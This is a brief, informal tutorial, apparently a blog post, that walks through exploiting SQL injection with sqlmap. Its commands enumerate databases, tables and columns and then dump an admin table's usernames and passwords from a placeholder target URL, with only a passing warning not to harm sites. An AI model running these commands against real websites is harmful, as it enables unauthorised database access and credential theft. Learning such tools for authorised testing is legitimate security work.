SQL Injection through SQLMAP
Hello Guy, Today I gonna show you a major vulnerability in web applications. There are many types of injection and in this a SQL Injection Comes also. SQL Injection is very vast keep learning even though I am also still learner so without wasting any time lets come to point.
SQL Injection is a type of vulnerability in which an attacker can execute can some code and expose backend database or in simple words an attacker can dump your database.
SQL map is a command line interface tool use for exploiting SQL injection vulnerabilities it is a open source tool .
If you are using windows you can download SQL Map Here , However Kali has inbuilt SQLMAP
Lets start practicle…….
- Launch SQLMAP
Now type Following command in terminal
- python sqlmap.py -u http://yourtargetaddress.com/?id=1 –current-db
- Now our SQL map started. It will take some couple of seconds to enumerate database
- now we got the database as you can see the above image. our next step is to enumerate tables
- Type the following command to enumerate tables follow me step by step. 🙂
python sqlmap.py -u http://yourtargetaddress.com/?id=1 -D database name –table
as you can see in the below image we had successfully enumerate table names.
In the above Image you can see that sqlmap enumerated table name no we will have to find column. here i am finding columns fo admin.
python sqlmap.py -u http://yourtargetaddress.com/?id=1 -D database name -T table name –columns
again sqlmap is enumerating column name from the table admin.
Cool guys we had successfully enumerate the column name now our next step is to dump/enumerate the Username and password.
Follow me and use this command
python sqlmap.py -u http://yourtargetaddress.com/?id=1 -D database name -T table name -C column name –dump
sql map started a enumerating database as you can see database enumerated.
yeah, we got username and password.. 🙂 keep learning and practising but don’t harm any site…